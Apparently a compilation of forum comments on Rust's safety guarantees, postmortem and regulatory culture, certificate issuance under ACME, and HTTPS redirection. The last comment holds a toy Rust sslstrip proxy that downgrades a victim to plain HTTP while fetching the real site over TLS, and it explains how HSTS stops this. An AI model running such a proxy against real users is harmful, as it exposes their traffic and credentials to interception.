In languages like Java, their version of the Billion Dollar Mistake (the null reference) doesn't have arbitrary Undefined Behaviour, but it is still going to blow up your program - so you also need to track which things might be null, or pay everywhere to keep checking your work. Since Rust doesn't have the mistake, you don't need to do either.
Likewise, C# apparently doesn't have arbitrary Undefined Behaviour for data races. But a racy C# program does lose Sequential Consistency, and humans can't successfully reason about non-trivial software once that happens, whereas safe Rust doesn't have data races, so no problem.
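To make "doesn't have data races" concrete, here's a minimal sketch of safe Rust refusing to compile one (error text abbreviated in the comment):

    use std::thread;

    fn main() {
        let mut counter = 0;
        thread::scope(|s| {
            s.spawn(|| counter += 1);
            s.spawn(|| counter += 1); // error[E0499]: cannot borrow
                                      // `counter` as mutable more
                                      // than once at a time
        });
    }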
Neither of these languages can model the no-defaults case - a type for which no default value makes sense - which is trivial in Rust and, ironically, plausible though not trivial in C++. So if you have no-defaults anywhere in your problem, Rust is fine with that, while languages like Go and Java can't help you; "just imagine a default into existence and code around the problem" sounds like cognitive load to me.
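A sketch of the no-defaults case (the Account type here is invented for illustration):

    // No sensible default owner exists, so we simply don't define
    // one: no Default impl, and no null hiding in the field either.
    struct Account {
        owner: String,
    }

    fn main() {
        // The only way to get an Account is to supply every field:
        let a = Account { owner: String::from("jane") };
        println!("{}", a.owner);
        // Go's `var a Account` would silently conjure owner == "";
        // Rust has no spelling which conjures one by accident.
    }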
This seems like a very strange position: code written for Rust in 2015 still works, and 2015 Rust just doesn't have const generics†, or async, or I/O safety, so... how is that not a subset of the language as it stands today?
† As you're apparently a C++ programmer you would call these "Non-type template parameters"
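If you haven't met them, a const generic is just a compile-time value parameter (a minimal sketch):

    // N is a value, not a type - the C++ NTTP analogy is exact here.
    fn sum<const N: usize>(xs: [i64; N]) -> i64 {
        xs.iter().sum()
    }

    fn main() {
        println!("{}", sum([1, 2, 3])); // N is inferred as 3
    }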
C++ as First Language seems like an especially terrible idea to me. Maybe I should take a few months and go do one of those courses and see whether it's as bad as I expect.
The nice thing about Rust as First Language (which I'm not sure I'd endorse, but it can't be as bad as C++) is that because safe Rust ropes off so many footguns it's extremely unlikely that you'll be seriously injured by your lack of understanding as a beginner. You may not be able to do something because you didn't yet understand how - or you might do something in a terribly sub-optimal way, but you're not likely to accidentally write nonsense without realising and have that seem to work.
For example, yesterday there was that piece where the author seems to have misunderstood how heap allocation works in Rust. But in safe Rust that's actually harmless: if they write their mistake it won't compile; maybe they figure out why, maybe they give up and can't use heap allocation until they learn more.
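For instance, the classic beginner version of that mistake - returning a reference to a stack local in the belief that this "allocates" something - is a guaranteed compile error in safe Rust (a minimal sketch):

    fn broken() -> &'static String {
        let s = String::from("oops");
        &s // error[E0515]: cannot return reference to local variable `s`
    }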
I haven't thought too hard about Zig as first language, because to me the instability rules that out. Lecturers hate teaching moving targets.
As somebody that "learned" C++ (Borland C++... the aggressively blue memories...) first at a very young age, I heartily agree.
Rust just feels natural now. Possibly because I was exposed to this harsh universe of problems early. Most of the stupid traps that I fell into are clearly marked and easy to avoid.
It's just so easy to write C++ that seems like it works until it doesn't...
There's probably a "Pay it forwards" lesson from Rust's diagnostics too.
So much end user software tries to be "friendly" by just saying "An error occurred" regardless of what's wrong or whether you can do anything about it. Rust does better and it's a reminder that you can too.
Yeah, I immediately twitched when I saw the PartialEq implementation. Somebody is going to write code which finds the "correct" order and ends up allowing someone to order the same pizza but get yours, while you have to wait for it to be made and cooked again.
It's not difficult to write a predicate like same_details_as() instead; then it's obvious to reviewers that this is what we meant, and it discourages weird ad-hoc code which might stop working when PizzaDetails is redefined.
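Something like this - all the types here are invented for illustration:

    // Note: deliberately no PartialEq on Order itself, because two
    // orders with identical contents are still different orders.
    #[derive(PartialEq)]
    struct PizzaDetails {
        size: u8,
        toppings: Vec<String>,
    }

    struct Order {
        id: u64, // identity - never part of "same details"
        details: PizzaDetails,
    }

    impl Order {
        fn same_details_as(&self, other: &Order) -> bool {
            self.details == other.details
        }
    }

    fn main() {
        let mine = Order { id: 1, details: PizzaDetails { size: 12, toppings: vec!["basil".into()] } };
        let yours = Order { id: 2, details: PizzaDetails { size: 12, toppings: vec!["basil".into()] } };
        assert!(mine.same_details_as(&yours)); // same pizza...
        assert_ne!(mine.id, yours.id);         // ...different order
    }

Now `mine == yours` simply doesn't compile, so nobody can accidentally treat "same details" as "same order".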
Apparently, somehow, this had never been how Cloudflare did things. I expressed incredulity about this to one of their employees, but yeah, it seems their attitude was "We never make mistakes, so it's fastest to just deploy every change across the entire system immediately" - and as we've seen repeatedly of late, that means it sometimes blows up.
They have blameless post mortems, but maybe "We actually do make mistakes so this practice is not good" wasn't a lesson anybody wanted to hear.
Blameless post mortems should be similar to air accident investigations. I.e. don't blame the people involved (unless they are acting maliciously), but identify and fix the issues to ensure this particular incident is unlikely to recur.
The intent of the postmortems is to learn what the issues are and prevent or mitigate similar issues happening in the future. If you don't make changes as a result of a postmortem then there's no point in conducting them.
The aviation industry regularly requires certifications, check rides, and re-qualifications when humans mess up. I have never seen anything like that in tech.
Sometimes the solution is to not let certain people do certain things which are risky.
Agree 100%. However, using your example, there is no regulatory agency that investigates the issue and demands changes to avoid related future problems. Should the industry move in that direction?
However, one of the things you see (if you read enough of them) in accident investigation reports for regulated industries is a recurring pattern:
1. Accident happens
2. Investigators conclude Accident would not happen if people did X. Recommend regulator requires that people do X, citing previous such recommendations each iteration
3. Regulator declined this recommendation, arguing it's too expensive to do X, or people already do X, or even (hilariously) both
4. Go to 1.
Too often, what happens is that eventually:
5. Extremely Famous Accident Happens, e.g. killing beloved celebrity Space Cowboy
6. Investigators conclude Accident would not happen if people did X, remind regulator that they have previously recommended requiring X
7. Press finally reads dozens of previous reports and so News Story says: Regulator killed Space Cowboy!
8. Regulator decides actually they always meant to require X after all
As bad as (3) sounds, I'll strongman the argument: it's important to keep the economic cost of any regulation in mind.*
On the one hand, you'd like to prevent the thing the regulation is seeking to prevent.
On the other hand, you'd have costs for the regulation to be implemented (one-time and/or ongoing).
"Is the good worth the costs?" is a question worth asking every time. (Not least because sometimes it lets you downscope/target regulations to get better good ROI)
*Yes, the easy pessimistic take is 'industry fights all regulation on cost grounds', but the fact that the argument is abused doesn't mean it doesn't have some underlying merit
I think conventionally the verb is "to steelman" with the intended contrast being to a strawman, an intentionally weak argument by analogy to how straw isn't strong but steel is. I understood what you meant by "strongman" but I think that "steelman" is better here.
There is indeed a good reason regulators aren't simply obliged to institute all recommendations - that would be a lot of new rules. The only accident report I remember reading with zero recommendations was an MAIB (maritime accidents) report here, which concluded that a crew member of a fishing boat had died at sea after their vessel capsized because both they and the skipper (who survived) were on heroin. The rationale for not recommending anything was that heroin is already illegal, operating a fishing boat while on heroin is already illegal, and it's also obviously a bad idea, so there's nothing to recommend: "Don't do that".
Cost is rarely very persuasive to me, because it's very difficult to correctly estimate what it will actually cost to change something once you've decided it's required, based on the current reality where it is not. Mass production and clever cost reductions resulting from normal commercial pressures tend to drive down costs when we require something, but not before (and often not after we cease to require it, either).
It's also difficult to anticipate all benefits from a good change without trying it. Lobbyists against a regulation will often try hard not to imagine benefits after all they're fighting not to be regulated. But once it's in action, it may be obvious to everyone that this was just a better idea and absurd it wasn't always the case.
Remember when you were allowed to smoke cigarettes on aeroplanes? That seems crazy, but at the time it was normal and I'm sure carriers insisted that not being allowed to do this would cost them money - and perhaps for a short while it did.
> it's very difficult to correctly estimate what it will actually cost to change something once you've decided it's required, based on the current reality where it is not. Mass production and clever cost reductions resulting from normal commercial pressures tend to drive down costs
Difficult, but not impossible.
What is calculable, and does NOT scale down, is the cost of compliance documentation and processes. Going from 1 form of documentation to 4 forms of documentation has a measurable cost, and that cost will be imposed forever.
> It's also difficult to anticipate all benefits from a good change without trying it.
That's not a great argument, because it can be counterbalanced by the equally true opposite: it's difficult to anticipate all downsides to a change without trying it.
> Remember when you were allowed to smoke cigarettes on aeroplanes?
Remember when you could walk up to a gate 5 minutes before a flight, buy a ticket, and fly?
The current TSA security theater has had some benefits, but it's also made using airports far worse as a traveler.
I mean, I'm pretty sure there was a long period where you could walk up 5 minutes before, and fly on a plane where you're not allowed to smoke. It's completely unrelated.
The TSA makes no sense as a safety intervention; it's theatre. It's supposed to look like we're trying hard to solve the problem, not actually be an attempt to solve the problem. And if there was an accident investigation for 9/11, I can't think why - that's not an accident.
As to your specific claim about documentation overhead: in many cases we don't even know whether a regulation would increase paperwork at all. Rationalization driven by new regulation can actually reduce it instead.
For a non-regulatory example (at least in the sense that there are no government regulators involved), consider Let's Encrypt's ACME, which was discussed here recently. ACME complies with the "Ten Blessed Methods". But prior to Let's Encrypt, the most common processes weren't stricter or more robust - they were much worse and much more labour intensive. Some of them were prohibited more or less immediately once the "Ten Blessed Methods" were required, because they were just obviously unacceptable.
The Proof of Control records from ACME are much better than what had previously been the usual practice, yet Let's Encrypt is $0 at the point of use - and even if we count the actual cost (borne by donations rather than subscribers), it's much cheaper than the prior commercial operators were, for much more value delivered.
> They have blameless post mortems, but maybe "We actually do make mistakes so this practice is not good" wasn't a lesson anybody wanted to hear.
Or they could say, "we want to continue to prioritise speed of security rollouts over stability, and despite our best efforts, we do make mistakes, so sometimes we expect things will blow up".
I guess it depends what you're optimising for... If the rollout speed of security patches is the priority then maybe increased downtime is a price worth paying (in their eyes anyway)... I don't agree with that, but at least it's an honest position to take.
That said, if this was to address the React CVE then it was hardly a speedy patch anyway... You'd think they could have afforded to stagger the rollout over a few hours at least.
It's just poor risk management at this point. Making sure that a configuration change doesn't crash the production service shouldn't take more than a few seconds in a well-engineered system even if you're not doing staged rollout.
> In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function.
I can't figure out what the author is envisioning here for Rust.
Maybe they actually think that if they make a pointer to some local variable and then return the pointer, that's somehow allocating heap? It isn't: the local variable was on the stack, so when you return it's gone, invalidating your pointer. But Rust is OK with the mere existence of invalid pointers - after all, safe Rust can't dereference any pointers, and unsafe Rust declares that the programmer has taken care to ensure any pointers being dereferenced are valid (which this pointer to a long-dead variable is not).
[If you run a new enough Rust I believe Clippy now warns that this is a bad idea, because it's not illegal to do this, but it's almost certainly not what you actually meant]
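Concretely, if that is the misunderstanding, this is what it looks like - and it compiles:

    // Compiles fine: merely creating and returning an invalid raw
    // pointer is legal, and there's no heap allocation anywhere here.
    fn not_heap() -> *const i32 {
        let x = 42;          // `x` lives on the stack...
        &x as *const i32     // ...and dies when we return, so the
                             // returned pointer is dangling
    }

    fn main() {
        let p = not_heap();
        println!("{:p}", p); // fine: we never dereference it
    }

Only `unsafe { *not_heap() }` - your (false) promise that the pointer is valid - could turn this into an actual problem.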
Or maybe in their mind, Box<Goose> is "a pointer to a struct" and so somehow a function call Box::new(some_goose) is "implicit" allocation, whereas the function they called in Zig to allocate memory for a Goose was explicit?
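For reference, here's what both spellings actually do (Goose is hypothetical):

    struct Goose { honks: u32 }

    // Returns the struct by value: no heap allocation at all, the
    // value is simply moved to the caller.
    fn make_goose() -> Goose {
        Goose { honks: 3 }
    }

    // Heap allocation in Rust is this explicit call. It doesn't take
    // an allocator parameter the way Zig's allocation functions do,
    // but there's nothing implicit about it.
    fn boxed_goose() -> Box<Goose> {
        Box::new(make_goose())
    }

    fn main() {
        let g = boxed_goose(); // exactly one heap allocation
        println!("{}", g.honks);
    }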
Yeah, this is very confusing to me. In Go the compiler implicitly decides whether a pointer escapes to the heap, based on escape analysis, with no way for the programmer to tell except by replicating the compiler's reasoning in their head. In Rust you explicitly call one of the APIs that exist for the sole purpose of allocating on the heap. I don't see how someone can conflate the two without either fundamentally misunderstanding something or intentionally being misleading.
In fact, for the publicly trusted CAs, knowing the private key for a certificate you issue to somebody else is strictly forbidden. That's what happened years back when a "reseller" company named Trustico literally sent the private keys for all their customers to the issuing CA, apparently under the impression this would somehow result in refunding or re-issuing or something. The CA checked, went "These are real, WTF?" and revoked all the now-useless certificates.
It is called a private key for a reason. Don't tell anybody. It's not a secret that you're supposed to share with somebody, it's private, tell nobody. Which in this case means - don't let your "reseller" choose the key, that's now their key, your key should be private which means you don't tell anybody what it is.
If you're thinking "But wait, if I don't tell anybody, how can that work?" then congratulations - this is tricky mathematics they didn't cover in school. It's called "Public key cryptography" and it was only invented in the 20th century. You don't need to understand how it works, but if you want to know, the easiest kind still used today is the RSA digital signature, so you can watch videos or read a tutorial about that.
If you're just wondering about Let's Encrypt: Let's Encrypt don't know, or want to know, anybody else's private keys either. In the entirely automated cases, the ACME software you use will pick random keys, tell nobody, store them for use by the server software, and obtain a suitable certificate for those keys - all despite never telling anybody what the key is.
So, the crucial thing ACME has that the other protocols do not is a hole for the Proof of Control (along with some example ways to fill that hole for your purpose; others are documented in newer RFCs).
See, SCEP assumes that Bob trusts Alice to make certificates. Alice uses the SCEP server provided by Bob, but she can make any certificate that Bob allows. If she wants to make a certificate claiming she's the US Department of Education, or Hacker News, or Tesco supermarkets, she can do that. For your private Intranet that's probably fine: Alice is head of Cyber Security, she issues certificates according to local rules, OK.
But for the public web we have rules about who we should issue certificates to, and these ultimately boil down to: we want to issue certificates only to the people who actually control the name they're getting a certificate for. Historically this had once been extremely hardcore (in the mid-1990s when SSL was new), but a race to the bottom ensued and it became basically "Do you have working email for that domain?" - and sometimes not even that.
So in parallel with Let's Encrypt, work happened to drag all the trusted certificate issuers to new rules called the "Ten Blessed Methods" which listed (initially ten) ways you could be sure that this subscriber is allowed a certificate for news.ycombinator.com and so if you want to do so you're allowed to issue that certificate.
Several ACME kinds of Proof of Control are actually directly reflected in the Ten Blessed Methods, and gradually the manual options have been deprecated and more stuff moves to ACME.
e.g. "3.2.2.4.19 Agreed‑Upon Change to Website ‑ ACME" is a specific method which is how your cheesiest "Let's Encrypt in a box" type software tends to work, where we prove we control www.some.example by literally just changing a page on www.some.example in a specific way when requested and that's part of the ACME specification so it can be done automatically without a human in the loop.
Redirection doesn't get the job done without at least a mechanism so that browsers reliably stop visiting the HTTP site (HSTS), and ideally an HTTPS-everywhere feature - which, in turn, was not deployable for ordinary people until almost every common site they visit was HTTPS-enabled and working properly.
The problem is that there are active bad guys. Redirection means that when there are no bad guys, or only passive bad guys, the traffic gets encrypted - but active bad guys just ensure the redirect sends people to their site instead.
Users who go to http://mysite.example/ would be "redirected" to https://mysite.example/ but that redirection wasn't protected so instead the active bad guy ensures they're redirected to https://scam.example/mysite/ and look, it has the padlock symbol and it says mysite in the bar, what more do you want?
Snowden was definitely a coincidence in the sense that this wasn't a pull decision - users didn't demand this as a result of Snowden. However, Snowden is why BCP #188 (RFC 7258), aka "Pervasive Monitoring is an Attack", happened, and BCP #188 certainly helped, because it was shorthand for why the arguments against encryption everywhere were bogus. One or another advocate for some group who supposedly "needs" to be able to snoop on you stands up and gives a twenty minute presentation about why, although they think encryption is great, they do need to, er, not have encryption - and the response in one sentence is "BCP 188 says don't do this". Case closed, go away.
There are always people who insist they have a legitimate need to snoop. Right now in Europe they're pulling on people's "protect the children" heartstrings, but we already know - also in Europe - that the very moment this narrative opens a tiny crack, in march the giant corporations who demand to snoop to make sure they get their money, and the government spies who need to snoop on everybody to make sure they don't get out of line.
> Users who go to http://mysite.example/ would be "redirected" to https://mysite.example/ but that redirection wasn't protected so instead the active bad guy ensures they're redirected to https://scam.example/mysite/ and look, it has the padlock symbol and it says mysite in the bar, what more do you want?
You can do better than this: have your MITM proxy follow the SSL redirect itself, but still present plain HTTP to the client. The client still sees the true "mysite.example" domain in the URL bar (albeit on plain http), the server sees a good SSL session, and the attacker gets to see all of the traffic.
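This is the classic sslstrip technique. A toy sketch of the idea, assuming the reqwest crate (with its "blocking" feature) and the placeholder mysite.example from above:

    use std::io::{BufRead, BufReader, Write};
    use std::net::TcpListener;

    fn main() -> std::io::Result<()> {
        // The victim speaks plain HTTP to us...
        let listener = TcpListener::bind("0.0.0.0:80")?;
        for stream in listener.incoming() {
            let mut stream = stream?;
            let mut line = String::new();
            BufReader::new(&stream).read_line(&mut line)?;
            let path = line.split_whitespace().nth(1).unwrap_or("/");

            // ...while we fetch the real site over real TLS, so the
            // server sees a perfectly good HTTPS session.
            let body = reqwest::blocking::get(format!("https://mysite.example{path}"))
                .and_then(|r| r.text())
                .unwrap_or_default();

            // This is the attack: everything the victim sees (and,
            // with a little more code, everything they submit)
            // passes through us in the clear.
            write!(
                stream,
                "HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n{}",
                body.len(),
                body
            )?;
        }
        Ok(())
    }

HSTS defeats this because the browser refuses to speak plain HTTP to mysite.example at all, so there's no plaintext leg for the proxy to sit on.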